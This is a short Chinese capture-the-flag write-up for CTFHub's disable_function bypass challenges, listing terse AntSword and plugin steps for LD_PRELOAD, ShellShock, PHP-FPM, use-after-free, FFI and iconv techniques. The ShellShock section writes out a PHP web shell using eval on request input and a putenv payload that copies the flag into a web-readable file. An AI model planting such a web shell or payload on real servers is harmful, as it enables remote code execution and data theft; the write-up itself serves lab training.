ctfhub Bypass disable_function(完结)

LD_PRELOAD

url

蚁剑连接

选择插件

点击开始

查看到此文件名编辑连接拼接到url后面重新连接

点击开启终端

在终端执行命令

复制代码
ls /
/readfile

ShellShock

url

CTFHub 环境实例 | 提示信息

蚁剑连接

写入shell.php

复制代码
<?php
  @eval($_REQUEST['ant']);
  putenv("PHP_test=() { :; }; tac /flag >> /var/www/html/test.php");
  error_log("admin",1);
  //mail("admin@localhost","","","","");
?>

使用插件

终端执行命令得到flag

Apache Mod CGI

查看GetFlag

蚁剑连接

直接使用工具

终端执行命令

PHP-FPM

蚁剑连接

工具连接

拼接地址

在终端执行命令

GC UAF

蚁剑连接

使用工具

在终端执行命令

Json Serializer UAF

页面

蚁剑连接

使用工具

执行命令

Backtrace UAF

访问页面

蚁剑连接,使用工具

执行命令

FFI

使用工具

执行命令

iconv

使用工具

刷新查看文件

修改连接,拼接地址

终端执行命令

iconv Bypass 1

与icon一样的步骤

iconv Bypass 2

与icon一样的步骤

相关推荐
QmDeve18 小时前
Android内存泄漏排查难?手把手带你用Profiler“揪出”元凶!(附实战案例)
android·android studio
de之梦-御风19 小时前
【Linux】 MediaMTX测试是否运行
linux·运维·服务器
早睡冠军候选人19 小时前
K8s学习----StorageClass:实现存储资源的动态管理
运维·学习·云原生·容器·kubernetes
WheatHusks19 小时前
android中调用相册
android
Dovis(誓平步青云)19 小时前
《Linux 进程(1)概念入门:从 “运行的程序” 到核心定义》
linux·运维·服务器
winrisef19 小时前
删除无限递归文件夹
java·ide·python·pycharm·系统安全
元直数字电路验证19 小时前
进入WSL2 Ubuntu环境的完整指南
linux·运维·ubuntu·wsl
IDOlaoluo20 小时前
CentOS 7 系统安装步骤(从U盘启动到桌面详细流程)附镜像下载
linux·运维·centos
荣光波比20 小时前
MySQL数据库(八)—— MySQL全量+增量备份方案:从脚本开发到连锁餐饮场景落地
运维·数据库·mysql·云计算
轻造科技21 小时前
瓦楞纸箱厂柔性交付:电商订单波动下的纸板裁切与印刷协同技巧
大数据·运维·mes